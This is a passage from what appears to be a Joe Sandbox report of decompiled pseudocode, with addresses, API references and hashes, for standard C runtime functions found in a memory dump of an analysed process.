                        0x00000000
                        0x004095ce
                        0x004095ce
                        0x004095d2
                        0x004095d2
                        0x004095cc

                        APIs
                        • GetModuleHandleA.KERNEL32(KERNEL32,004068AA), ref: 004095B4
                        • GetProcAddress.KERNEL32(00000000,IsProcessorFeaturePresent), ref: 004095C4
                        Strings
                        Memory Dump Source
                        • Source File: 0000000C.00000002.513969633.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 0000000C.00000002.513942243.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                        • Associated: 0000000C.00000002.514209611.000000000041C000.00000008.00000001.01000000.00000008.sdmpDownload File
                        • Associated: 0000000C.00000002.514428932.000000000042C000.00000004.00000001.01000000.00000008.sdmpDownload File
                        • Associated: 0000000C.00000002.514513201.0000000000431000.00000002.00000001.01000000.00000008.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_12_2_400000_sifdvgf.jbxd
                        Similarity
                        • API ID: AddressHandleModuleProc
                        • String ID: IsProcessorFeaturePresent$KERNEL32
                        • API String ID: 1646373207-3105848591
                        • Opcode ID: 42ce375bee8a8cf742697974e5cdae8eb36b2f87cd69389d819ec3c053a1e79a
                        • Instruction ID: 420fee4b7b8c9d102a00ce1403d5f9c7b68c6b4b741a890553f7b07840975166
                        • Opcode Fuzzy Hash: 42ce375bee8a8cf742697974e5cdae8eb36b2f87cd69389d819ec3c053a1e79a
                        • Instruction Fuzzy Hash: 01F09031A00A09E2DF012BA2BD0A36F7A79BB80746F9604B1E1D2F00E5CF3585B1824E
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 91%
                        			E0040C56B(signed int __edx, signed int _a4, signed int _a8, signed int _a12, intOrPtr* _a16) {
                        				signed int _v8;
                        				signed int _v12;
                        				signed int _v16;
                        				void* __ebx;
                        				void* __edi;
                        				void* __esi;
                        				void* __ebp;
                        				signed int _t59;
                        				intOrPtr* _t61;
                        				signed int _t63;
                        				void* _t68;
                        				signed int _t69;
                        				signed int _t72;
                        				signed int _t74;
                        				signed int _t75;
                        				signed int _t77;
                        				signed int _t78;
                        				signed int _t81;
                        				signed int _t82;
                        				signed int _t84;
                        				signed int _t88;
                        				signed int _t97;
                        				signed int _t98;
                        				signed int _t99;
                        				intOrPtr* _t100;
                        				void* _t101;
                        
                        				_t90 = __edx;
                        				if(_a8 == 0 || _a12 == 0) {
                        					L4:
                        					return 0;
                        				} else {
                        					_t100 = _a16;
                        					if(_t100 != 0) {
                        						_t82 = _a4;
                        						__eflags = _t82;
                        						if(_t82 == 0) {
                        							goto L3;
                        						}
                        						_t63 = _t59 | 0xffffffff;
                        						_t90 = _t63 % _a8;
                        						__eflags = _a12 - _t63 / _a8;
                        						if(_a12 > _t63 / _a8) {
                        							goto L3;
                        						}
                        						_t97 = _a8 * _a12;
                        						__eflags =  *(_t100 + 0xc) & 0x0000010c;
                        						_v8 = _t82;
                        						_v16 = _t97;
                        						_t81 = _t97;
                        						if(( *(_t100 + 0xc) & 0x0000010c) == 0) {
                        							_v12 = 0x1000;
                        						} else {
                        							_v12 =  *(_t100 + 0x18);
                        						}
                        						__eflags = _t97;
                        						if(_t97 == 0) {
                        							L32:
                        							return _a12;
                        						} else {
                        							do {
                        								_t84 =  *(_t100 + 0xc) & 0x00000108;
                        								__eflags = _t84;
                        								if(_t84 == 0) {
                        									L18:
                        									__eflags = _t81 - _v12;
                        									if(_t81 < _v12) {
                        										_t68 = E0040C407(_t97,  *_v8, _t100);
                        										__eflags = _t68 - 0xffffffff;
                        										if(_t68 == 0xffffffff) {
                        											L34:
                        											_t69 = _t97;
                        											L35:
                        											return (_t69 - _t81) / _a8;
                        										}
                        										_v8 = _v8 + 1;
                        										_t72 =  *(_t100 + 0x18);
                        										_t81 = _t81 - 1;
                        										_v12 = _t72;
                        										__eflags = _t72;
                        										if(_t72 <= 0) {
                        											_v12 = 1;
                        										}
                        										goto L31;
                        									}
                        									__eflags = _t84;
                        									if(_t84 == 0) {
                        										L21:
                        										__eflags = _v12;
                        										_t98 = _t81;
                        										if(_v12 != 0) {
                        											_t75 = _t81;
                        											_t90 = _t75 % _v12;
                        											_t98 = _t98 - _t75 % _v12;
                        											__eflags = _t98;
                        										}
                        										_push(_t98);
                        										_push(_v8);
                        										_push(E0040C0F3(_t100));
                        										_t74 = E00411BEA(_t81, _t90, _t98, _t100, __eflags);
                        										_t101 = _t101 + 0xc;
                        										__eflags = _t74 - 0xffffffff;
                        										if(_t74 == 0xffffffff) {
                        											L36:
                        											 *(_t100 + 0xc) =  *(_t100 + 0xc) | 0x00000020;
                        											_t69 = _v16;
                        											goto L35;
                        										} else {
                        											_t88 = _t98;
                        											__eflags = _t74 - _t98;
                        											if(_t74 <= _t98) {
                        												_t88 = _t74;
                        											}
                        											_v8 = _v8 + _t88;
                        											_t81 = _t81 - _t88;
                        											__eflags = _t74 - _t98;
                        											if(_t74 < _t98) {
                        												goto L36;
                        											} else {
                        												L27:
                        												_t97 = _v16;
                        												goto L31;
                        											}
                        										}
                        									}
                        									_t77 = E0041098A(_t90, _t100);
                        									__eflags = _t77;
                        									if(_t77 != 0) {
                        										goto L34;
                        									}
                        									goto L21;
                        								}
                        								_t78 =  *(_t100 + 4);
                        								__eflags = _t78;
                        								if(__eflags == 0) {
                        									goto L18;
                        								}
                        								if(__eflags < 0) {
                        									_t48 = _t100 + 0xc;
                        									 *_t48 =  *(_t100 + 0xc) | 0x00000020;
                        									__eflags =  *_t48;
                        									goto L34;
                        								}
                        								_t99 = _t81;
                        								__eflags = _t81 - _t78;
                        								if(_t81 >= _t78) {
                        									_t99 = _t78;
                        								}
                        								E00407BB0(_t81, _t99, _t100,  *_t100, _v8, _t99);
                        								 *(_t100 + 4) =  *(_t100 + 4) - _t99;
                        								 *_t100 =  *_t100 + _t99;
                        								_t101 = _t101 + 0xc;
                        								_t81 = _t81 - _t99;
                        								_v8 = _v8 + _t99;
                        								goto L27;
                        								L31:
                        								__eflags = _t81;
                        							} while (_t81 != 0);
                        							goto L32;
                        						}
                        					}
                        					L3:
                        					_t61 = E00407F57();
                        					_push(0);
                        					_push(0);
                        					_push(0);
                        					_push(0);
                        					_push(0);
                        					 *_t61 = 0x16;
                        					E00406D3E(_t90, 0, _t100);
                        					goto L4;
                        				}
                        			}





























                        0x0040c56b
                        0x0040c57b
                        0x0040c5a1
                        0x00000000
                        0x0040c582
                        0x0040c582
                        0x0040c587
                        0x0040c5a8
                        0x0040c5ab
                        0x0040c5ad
                        0x00000000
                        0x00000000
                        0x0040c5af
                        0x0040c5b4
                        0x0040c5b7
                        0x0040c5ba
                        0x00000000
                        0x00000000
                        0x0040c5bf
                        0x0040c5c3
                        0x0040c5ca
                        0x0040c5cd
                        0x0040c5d0
                        0x0040c5d2
                        0x0040c5dc
                        0x0040c5d4
                        0x0040c5d7
                        0x0040c5d7
                        0x0040c5e3
                        0x0040c5e5
                        0x0040c6aa
                        0x00000000
                        0x0040c5eb
                        0x0040c5eb
                        0x0040c5ee
                        0x0040c5ee
                        0x0040c5f4
                        0x0040c625
                        0x0040c625
                        0x0040c628
                        0x0040c681
                        0x0040c688
                        0x0040c68b
                        0x0040c6b6
                        0x0040c6b6
                        0x0040c6b8
                        0x00000000
                        0x0040c6bc
                        0x0040c68d
                        0x0040c690
                        0x0040c693
                        0x0040c694
                        0x0040c697
                        0x0040c699
                        0x0040c69b
                        0x0040c69b
                        0x00000000
                        0x0040c699
                        0x0040c62a
                        0x0040c62c
                        0x0040c639
                        0x0040c639
                        0x0040c63d
                        0x0040c63f
                        0x0040c643
                        0x0040c645
                        0x0040c648
                        0x0040c648
                        0x0040c648
                        0x0040c64a
                        0x0040c64b
                        0x0040c655
                        0x0040c656
                        0x0040c65b
                        0x0040c65e
                        0x0040c661
                        0x0040c6c4
                        0x0040c6c4
                        0x0040c6c8
                        0x00000000
                        0x0040c663
                        0x0040c663
                        0x0040c665
                        0x0040c667
                        0x0040c669
                        0x0040c669
                        0x0040c66b
                        0x0040c66e
                        0x0040c670
                        0x0040c672
                        0x00000000
                        0x0040c674
                        0x0040c674
                        0x0040c674
                        0x00000000
                        0x0040c674
                        0x0040c672
                        0x0040c661
                        0x0040c62f
                        0x0040c635
                        0x0040c637
                        0x00000000
                        0x00000000
                        0x00000000
                        0x0040c637
                        0x0040c5f6
                        0x0040c5f9
                        0x0040c5fb
                        0x00000000
                        0x00000000
                        0x0040c5fd
                        0x0040c6b2
                        0x0040c6b2
                        0x0040c6b2
                        0x00000000
                        0x0040c6b2
                        0x0040c603
                        0x0040c605
                        0x0040c607
                        0x0040c609
                        0x0040c609
                        0x0040c611
                        0x0040c616
                        0x0040c619
                        0x0040c61b
                        0x0040c61e
                        0x0040c620
                        0x00000000
                        0x0040c6a2
                        0x0040c6a2
                        0x0040c6a2
                        0x00000000
                        0x0040c5eb
                        0x0040c5e5
                        0x0040c589
                        0x0040c589
                        0x0040c58e
                        0x0040c58f
                        0x0040c590
                        0x0040c591
                        0x0040c592
                        0x0040c593
                        0x0040c599
                        0x00000000
                        0x0040c59e

                        APIs
                        • __flush.LIBCMT ref: 0040C62F
                        • __fileno.LIBCMT ref: 0040C64F
                        • __locking.LIBCMT ref: 0040C656
                        • __flsbuf.LIBCMT ref: 0040C681
                          • Part of subcall function 00407F57: __getptd_noexit.LIBCMT ref: 00407F57
                          • Part of subcall function 00406D3E: __decode_pointer.LIBCMT ref: 00406D49
                        Memory Dump Source
                        • Source File: 0000000C.00000002.513969633.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 0000000C.00000002.513942243.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                        • Associated: 0000000C.00000002.514209611.000000000041C000.00000008.00000001.01000000.00000008.sdmpDownload File
                        • Associated: 0000000C.00000002.514428932.000000000042C000.00000004.00000001.01000000.00000008.sdmpDownload File
                        • Associated: 0000000C.00000002.514513201.0000000000431000.00000002.00000001.01000000.00000008.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_12_2_400000_sifdvgf.jbxd
                        Similarity
                        • API ID: __decode_pointer__fileno__flsbuf__flush__getptd_noexit__locking
                        • String ID:
                        • API String ID: 3240763771-0
                        • Opcode ID: 46fff19aee5ea9a8fc14b2be84dca0e4e1a437739d758bfb5711d77188212393
                        • Instruction ID: 9b88df73e6d6caaa745b4f3553991fb21252c6c8a82537d4f00f019dc99cf697
                        • Opcode Fuzzy Hash: 46fff19aee5ea9a8fc14b2be84dca0e4e1a437739d758bfb5711d77188212393
                        • Instruction Fuzzy Hash: 4C41B571A00604EBDB24DF6A88D45AFB7B5AF80324F248B3BE455A72C0D779ED41CB48
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 100%
                        			E004169D6(short* _a4, char* _a8, intOrPtr _a12, intOrPtr _a16) {
                        				intOrPtr _v8;
                        				signed int _v12;
                        				char _v20;
                        				signed int _t54;
                        				intOrPtr _t56;
                        				int _t57;
                        				int _t58;
                        				signed short* _t59;
                        				short* _t60;
                        				int _t65;
                        				char* _t72;
                        
                        				_t72 = _a8;
                        				if(_t72 == 0 || _a12 == 0) {
                        					L5:
                        					return 0;
                        				} else {
                        					if( *_t72 != 0) {
                        						E004089C3( &_v20, _a16);
                        						if( *((intOrPtr*)(_v20 + 0x14)) != 0) {
                        							if(E00410D20( *_t72 & 0x000000ff,  &_v20) == 0) {
                        								if(MultiByteToWideChar( *(_v20 + 4), 9, _t72, 1, _a4, 0 | _a4 != 0x00000000) != 0) {
                        									L10:
                        									if(_v8 != 0) {
                        										 *(_v12 + 0x70) =  *(_v12 + 0x70) & 0xfffffffd;
                        									}
                        									return 1;
                        								}
                        								L21:
                        								_t54 = E00407F57();
                        								 *_t54 = 0x2a;
                        								if(_v8 != 0) {
                        									_t54 = _v12;
                        									 *(_t54 + 0x70) =  *(_t54 + 0x70) & 0xfffffffd;
                        								}
                        								return _t54 | 0xffffffff;
                        							}
                        							_t56 = _v20;
                        							_t65 =  *(_t56 + 0xac);
                        							if(_t65 <= 1 || _a12 < _t65) {
                        								L17:
                        								if(_a12 <  *(_t56 + 0xac) || _t72[1] == 0) {
                        									goto L21;
                        								} else {
                        									goto L19;
                        								}
                        							} else {
                        								_t58 = MultiByteToWideChar( *(_t56 + 4), 9, _t72, _t65, _a4, 0 | _a4 != 0x00000000);
                        								_t56 = _v20;
                        								if(_t58 != 0) {
                        									L19:
                        									_t57 =  *(_t56 + 0xac);
                        									if(_v8 == 0) {
                        										return _t57;
                        									}
                        									 *(_v12 + 0x70) =  *(_v12 + 0x70) & 0xfffffffd;
                        									return _t57;
                        								}
                        								goto L17;
                        							}
                        						}
                        						_t59 = _a4;
                        						if(_t59 != 0) {
                        							 *_t59 =  *_t72 & 0x000000ff;
                        						}
                        						goto L10;
                        					} else {
                        						_t60 = _a4;
                        						if(_t60 != 0) {
                        							 *_t60 = 0;
                        						}
                        						goto L5;
                        					}
                        				}
                        			}














                        0x004169e0
                        0x004169e7
                        0x004169fe
                        0x00000000
                        0x004169ee
                        0x004169f0
                        0x00416a0a
                        0x00416a15
                        0x00416a47
                        0x00416ae5
                        0x00416a25
                        0x00416a28
                        0x00416a2d
                        0x00416a2d
                        0x00000000
                        0x00416a33
                        0x00416aa7
                        0x00416aa7
                        0x00416aac
                        0x00416ab5
                        0x00416ab7
                        0x00416aba
                        0x00416aba
                        0x00000000
                        0x00416abe
                        0x00416a49
                        0x00416a4c
                        0x00416a55
                        0x00416a7c
                        0x00416a85
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00416a5c
                        0x00416a6f
                        0x00416a77
                        0x00416a7a
                        0x00416a8c
                        0x00416a8c
                        0x00416a95
                        0x00416a03
                        0x00416a03
                        0x00416a9e
                        0x00000000
                        0x00416a9e
                        0x00000000
                        0x00416a7a
                        0x00416a55
                        0x00416a17
                        0x00416a1c
                        0x00416a22
                        0x00416a22
                        0x00000000
                        0x004169f2
                        0x004169f2
                        0x004169f7
                        0x004169fb
                        0x004169fb
                        0x00000000
                        0x004169f7
                        0x004169f0

                        APIs
                        • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 00416A0A
                        • __isleadbyte_l.LIBCMT ref: 00416A3E
                        • MultiByteToWideChar.KERNEL32(00000080,00000009,?,?,?,00000000,?,?,?), ref: 00416A6F
                        • MultiByteToWideChar.KERNEL32(00000080,00000009,?,00000001,?,00000000,?,?,?), ref: 00416ADD
                        Memory Dump Source
                        • Source File: 0000000C.00000002.513969633.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 0000000C.00000002.513942243.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                        • Associated: 0000000C.00000002.514209611.000000000041C000.00000008.00000001.01000000.00000008.sdmpDownload File
                        • Associated: 0000000C.00000002.514428932.000000000042C000.00000004.00000001.01000000.00000008.sdmpDownload File
                        • Associated: 0000000C.00000002.514513201.0000000000431000.00000002.00000001.01000000.00000008.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_12_2_400000_sifdvgf.jbxd
                        Similarity
                        • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                        • String ID:
                        • API String ID: 3058430110-0
                        • Opcode ID: 0bd4586eaa071df3d80ff8fe1865f9c236fdafe29b5be2a119ff0eb7e6a2e53d
                        • Instruction ID: 3fcc8875d0a542d9fff72c78a7b0d81b7994ca812fa713602b319536ce183172
                        • Opcode Fuzzy Hash: 0bd4586eaa071df3d80ff8fe1865f9c236fdafe29b5be2a119ff0eb7e6a2e53d
                        • Instruction Fuzzy Hash: CA31E031A10285EFCB20DF64C8809FE3BB5BF02351B1685AAE466AB291D734DD80DB59
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 100%
                        			E0040947A(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28) {
                        				intOrPtr _t25;
                        				void* _t26;
                        				void* _t28;
                        
                        				_t25 = _a16;
                        				if(_t25 == 0x65 || _t25 == 0x45) {
                        					_t26 = E00408D6B(_t28, __eflags, _a4, _a8, _a12, _a20, _a24, _a28);
                        					goto L9;
                        				} else {
                        					_t34 = _t25 - 0x66;
                        					if(_t25 != 0x66) {
                        						__eflags = _t25 - 0x61;
                        						if(_t25 == 0x61) {
                        							L7:
                        							_t26 = E00408E5B(_t28, _a4, _a8, _a12, _a20, _a24, _a28);
                        						} else {
                        							__eflags = _t25 - 0x41;
                        							if(__eflags == 0) {
                        								goto L7;
                        							} else {
                        								_t26 = E00409380(_t28, __eflags, _a4, _a8, _a12, _a20, _a24, _a28);
                        							}
                        						}
                        						L9:
                        						return _t26;
                        					} else {
                        						return E004092C5(_t28, _t34, _a4, _a8, _a12, _a20, _a28);
                        					}
                        				}
                        			}






                        0x0040947f
                        0x00409485
                        0x004094f8
                        0x00000000
                        0x0040948c
                        0x0040948c
                        0x0040948f
                        0x004094aa
                        0x004094ad
                        0x004094cd
                        0x004094df
                        0x004094af
                        0x004094af
                        0x004094b2
                        0x00000000
                        0x004094b4
                        0x004094c6
                        0x004094c6
                        0x004094b2
                        0x004094fd
                        0x00409501
                        0x00409491
                        0x004094a9
                        0x004094a9
                        0x0040948f

                        APIs
                        Memory Dump Source
                        • Source File: 0000000C.00000002.513969633.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 0000000C.00000002.513942243.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                        • Associated: 0000000C.00000002.514209611.000000000041C000.00000008.00000001.01000000.00000008.sdmpDownload File
                        • Associated: 0000000C.00000002.514428932.000000000042C000.00000004.00000001.01000000.00000008.sdmpDownload File
                        • Associated: 0000000C.00000002.514513201.0000000000431000.00000002.00000001.01000000.00000008.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_12_2_400000_sifdvgf.jbxd
                        Similarity
                        • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                        • String ID:
                        • API String ID: 3016257755-0
                        • Opcode ID: bfaf9c04f800815b6471d517da42daec28121d5ec88fca071302ba537a085f53
                        • Instruction ID: 4be076c938bceef63c2f506d0f7b89980f48a47c416f2f60de0c2e2cad521dc1
                        • Opcode Fuzzy Hash: bfaf9c04f800815b6471d517da42daec28121d5ec88fca071302ba537a085f53
                        • Instruction Fuzzy Hash: 2311837240414EBBCF125E85DC41CEE3F22BB58354F19842AFE18641B2C73AC972AB85
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 90%
                        			E0040F45F(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
                        				signed int _t13;
                        				intOrPtr _t27;
                        				intOrPtr _t29;
                        				void* _t30;
                        				void* _t31;
                        
                        				_t31 = __eflags;
                        				_t26 = __edi;
                        				_t25 = __edx;
                        				_t22 = __ebx;
                        				_push(0xc);
                        				_push(0x417c58);
                        				E0040C128(__ebx, __edi, __esi);
                        				_t29 = E00409F6C(__ebx, __edx, _t31);
                        				_t13 =  *0x42d194; // 0xfffffffe
                        				if(( *(_t29 + 0x70) & _t13) == 0) {
                        					L6:
                        					E0040DB4D(_t22, _t26, 0xc);
                        					 *(_t30 - 4) =  *(_t30 - 4) & 0x00000000;
                        					_t8 = _t29 + 0x6c; // 0x6c
                        					_t27 =  *0x42d278; // 0x42d1a0
                        					 *((intOrPtr*)(_t30 - 0x1c)) = E0040F421(_t8, _t27);
                        					 *(_t30 - 4) = 0xfffffffe;
                        					E0040F4C9();
                        				} else {
                        					_t33 =  *((intOrPtr*)(_t29 + 0x6c));
                        					if( *((intOrPtr*)(_t29 + 0x6c)) == 0) {
                        						goto L6;
                        					} else {
                        						_t29 =  *((intOrPtr*)(E00409F6C(_t22, __edx, _t33) + 0x6c));
                        					}
                        				}
                        				if(_t29 == 0) {
                        					E0040CCA3(_t25, 0x20);
                        				}
                        				return E0040C16D(_t29);
                        			}








                        0x0040f45f
                        0x0040f45f
                        0x0040f45f
                        0x0040f45f
                        0x0040f45f
                        0x0040f461
                        0x0040f466
                        0x0040f470
                        0x0040f472
                        0x0040f47a
                        0x0040f49e
                        0x0040f4a0
                        0x0040f4a6
                        0x0040f4aa
                        0x0040f4ad
                        0x0040f4b8
                        0x0040f4bb
                        0x0040f4c2
                        0x0040f47c
                        0x0040f47c
                        0x0040f480
                        0x00000000
                        0x0040f482
                        0x0040f487
                        0x0040f487
                        0x0040f480
                        0x0040f48c
                        0x0040f490
                        0x0040f495
                        0x0040f49d

                        APIs
                        • __getptd.LIBCMT ref: 0040F46B
                          • Part of subcall function 00409F6C: __getptd_noexit.LIBCMT ref: 00409F6F
                          • Part of subcall function 00409F6C: __amsg_exit.LIBCMT ref: 00409F7C
                        • __getptd.LIBCMT ref: 0040F482
                        • __amsg_exit.LIBCMT ref: 0040F490
                        • __lock.LIBCMT ref: 0040F4A0
                        Memory Dump Source
                        • Source File: 0000000C.00000002.513969633.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 0000000C.00000002.513942243.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                        • Associated: 0000000C.00000002.514209611.000000000041C000.00000008.00000001.01000000.00000008.sdmpDownload File
                        • Associated: 0000000C.00000002.514428932.000000000042C000.00000004.00000001.01000000.00000008.sdmpDownload File
                        • Associated: 0000000C.00000002.514513201.0000000000431000.00000002.00000001.01000000.00000008.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_12_2_400000_sifdvgf.jbxd
                        Similarity
                        • API ID: __amsg_exit__getptd$__getptd_noexit__lock
                        • String ID:
                        • API String ID: 3521780317-0
                        • Opcode ID: c1e460487b385be20c3997de28e1949703a13e7a47ebf47c8db6bc9826152023
                        • Instruction ID: ad62b0fe31f90ab5027265babbd9e778aec5ed69125f5d0d4d1c1e1c356c8084
                        • Opcode Fuzzy Hash: c1e460487b385be20c3997de28e1949703a13e7a47ebf47c8db6bc9826152023
                        • Instruction Fuzzy Hash: 95F09631B04700DBE730FB75840275F72A05B50714F51427FA984B7AD2CB3C9905CA9D
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 100%
                        			E0040AFE2() {
                        				intOrPtr _t5;
                        				intOrPtr _t6;
                        				intOrPtr _t10;
                        				void* _t12;
                        				intOrPtr _t15;
                        				intOrPtr* _t16;
                        				signed int _t19;
                        				signed int _t20;
                        				intOrPtr _t26;
                        				intOrPtr _t27;
                        
                        				_t5 =  *0x430280;
                        				_t26 = 0x14;
                        				if(_t5 != 0) {
                        					if(_t5 < _t26) {
                        						_t5 = _t26;
                        						goto L4;
                        					}
                        				} else {
                        					_t5 = 0x200;
                        					L4:
                        					 *0x430280 = _t5;
                        				}
                        				_t6 = E00410529(_t5, 4);
                        				 *0x42f260 = _t6;
                        				if(_t6 != 0) {
                        					L8:
                        					_t19 = 0;
                        					_t15 = 0x42c7b0;
                        					while(1) {
                        						 *((intOrPtr*)(_t19 + _t6)) = _t15;
                        						_t15 = _t15 + 0x20;
                        						_t19 = _t19 + 4;
                        						if(_t15 >= 0x42ca30) {
                        							break;
                        						}
                        						_t6 =  *0x42f260;
                        					}
                        					_t27 = 0xfffffffe;
                        					_t20 = 0;
                        					_t16 = 0x42c7c0;
                        					do {
                        						_t10 =  *((intOrPtr*)(((_t20 & 0x0000001f) << 6) +  *((intOrPtr*)(0x42f160 + (_t20 >> 5) * 4))));
                        						if(_t10 == 0xffffffff || _t10 == _t27 || _t10 == 0) {
                        							 *_t16 = _t27;
                        						}
                        						_t16 = _t16 + 0x20;
                        						_t20 = _t20 + 1;
                        					} while (_t16 < 0x42c820);
                        					return 0;
                        				} else {
                        					 *0x430280 = _t26;
                        					_t6 = E00410529(_t26, 4);
                        					 *0x42f260 = _t6;
                        					if(_t6 != 0) {
                        						goto L8;
                        					} else {
                        						_t12 = 0x1a;
                        						return _t12;
                        					}
                        				}
                        			}













                        0x0040afe2
                        0x0040afea
                        0x0040afed
                        0x0040aff8
                        0x0040affa
                        0x00000000
                        0x0040affa
                        0x0040afef
                        0x0040afef
                        0x0040affc
                        0x0040affc
                        0x0040affc
                        0x0040b004
                        0x0040b00b
                        0x0040b012
                        0x0040b032
                        0x0040b032
                        0x0040b034
                        0x0040b040
                        0x0040b040
                        0x0040b043
                        0x0040b046
                        0x0040b04f
                        0x00000000
                        0x00000000
                        0x0040b03b
                        0x0040b03b
                        0x0040b053
                        0x0040b054
                        0x0040b056
                        0x0040b05c
                        0x0040b070
                        0x0040b076
                        0x0040b080
                        0x0040b080
                        0x0040b082
                        0x0040b085
                        0x0040b086
                        0x0040b092
                        0x0040b014
                        0x0040b017
                        0x0040b01d
                        0x0040b024
                        0x0040b02b
                        0x00000000
                        0x0040b02d
                        0x0040b02f
                        0x0040b031
                        0x0040b031
                        0x0040b02b

                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 0000000C.00000002.513969633.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 0000000C.00000002.513942243.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                        • Associated: 0000000C.00000002.514209611.000000000041C000.00000008.00000001.01000000.00000008.sdmpDownload File
                        • Associated: 0000000C.00000002.514428932.000000000042C000.00000004.00000001.01000000.00000008.sdmpDownload File
                        • Associated: 0000000C.00000002.514513201.0000000000431000.00000002.00000001.01000000.00000008.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_12_2_400000_sifdvgf.jbxd
                        Similarity
                        • API ID: __calloc_crt
                        • String ID: (!@
                        • API String ID: 3494438863-861706809
                        • Opcode ID: 3b89cfb7374a4b6736355ee4ea9648d338a4dcc5e1c608bee5186004743057a2
                        • Instruction ID: c81a334fc5c2411f4df701e27ede37d27c0d3a282a9f30c1c91d009ecc8411c5
                        • Opcode Fuzzy Hash: 3b89cfb7374a4b6736355ee4ea9648d338a4dcc5e1c608bee5186004743057a2
                        • Instruction Fuzzy Hash: 5211C6723043159BE7388A1DBC946672395EB85B68B64427BF521EB3D0E73CCC8256CD
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 86%
                        			E0040A6C8(void* __ebx, void* __edx, void* __edi, intOrPtr* __esi, void* __eflags) {
                        				intOrPtr _t17;
                        				intOrPtr* _t28;
                        				void* _t29;
                        				void* _t30;
                        
                        				_t30 = __eflags;
                        				_t28 = __esi;
                        				 *((intOrPtr*)(__edi - 4)) =  *((intOrPtr*)(_t29 - 0x24));
                        				E004070B6(__ebx, __edi, __esi,  *((intOrPtr*)(_t29 - 0x28)));
                        				 *((intOrPtr*)(E00409F6C(__ebx, __edx, _t30) + 0x88)) =  *((intOrPtr*)(_t29 - 0x2c));
                        				_t17 = E00409F6C(__ebx, __edx, _t30);
                        				 *((intOrPtr*)(_t17 + 0x8c)) =  *((intOrPtr*)(_t29 - 0x30));
                        				if( *__esi == 0xe06d7363 &&  *((intOrPtr*)(__esi + 0x10)) == 3) {
                        					_t17 =  *((intOrPtr*)(__esi + 0x14));
                        					if(_t17 == 0x19930520 || _t17 == 0x19930521 || _t17 == 0x19930522) {
                        						if( *((intOrPtr*)(_t29 - 0x34)) == 0 &&  *((intOrPtr*)(_t29 - 0x1c)) != 0) {
                        							_t17 = E0040708F( *((intOrPtr*)(_t28 + 0x18)));
                        							_t38 = _t17;
                        							if(_t17 != 0) {
                        								_push( *((intOrPtr*)(_t29 + 0x10)));
                        								_push(_t28);
                        								return E0040A460(_t38);
                        							}
                        						}
                        					}
                        				}
                        				return _t17;
                        			}







                        0x0040a6c8
                        0x0040a6c8
                        0x0040a6cb
                        0x0040a6d1
                        0x0040a6df
                        0x0040a6e5
                        0x0040a6ed
                        0x0040a6f9
                        0x0040a701
                        0x0040a709
                        0x0040a71d
                        0x0040a728
                        0x0040a72e
                        0x0040a730
                        0x0040a732
                        0x0040a735
                        0x00000000
                        0x0040a73c
                        0x0040a730
                        0x0040a71d
                        0x0040a709
                        0x0040a73d

                        APIs
                          • Part of subcall function 004070B6: __getptd.LIBCMT ref: 004070BC
                          • Part of subcall function 004070B6: __getptd.LIBCMT ref: 004070CC
                        • __getptd.LIBCMT ref: 0040A6D7
                          • Part of subcall function 00409F6C: __getptd_noexit.LIBCMT ref: 00409F6F
                          • Part of subcall function 00409F6C: __amsg_exit.LIBCMT ref: 00409F7C
                        • __getptd.LIBCMT ref: 0040A6E5
                        Strings
                        Memory Dump Source
                        • Source File: 0000000C.00000002.513969633.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 0000000C.00000002.513942243.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                        • Associated: 0000000C.00000002.514209611.000000000041C000.00000008.00000001.01000000.00000008.sdmpDownload File
                        • Associated: 0000000C.00000002.514428932.000000000042C000.00000004.00000001.01000000.00000008.sdmpDownload File
                        • Associated: 0000000C.00000002.514513201.0000000000431000.00000002.00000001.01000000.00000008.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_12_2_400000_sifdvgf.jbxd
                        Similarity
                        • API ID: __getptd$__amsg_exit__getptd_noexit
                        • String ID: csm
                        • API String ID: 803148776-1018135373
                        • Opcode ID: 5b147aff4b10d651f4ceec80f303942da5f950dc06aa6b0fc585759805665184
                        • Instruction ID: 2975dbf0f67d70b07405766a2e2fa21c276c90f76bf20612886aa0b38ed4f4f2
